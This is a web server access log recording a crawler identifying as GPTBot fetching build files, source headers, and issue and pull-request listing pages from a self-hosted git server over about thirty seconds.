"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:18:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:18:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11751] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10260] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10263] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 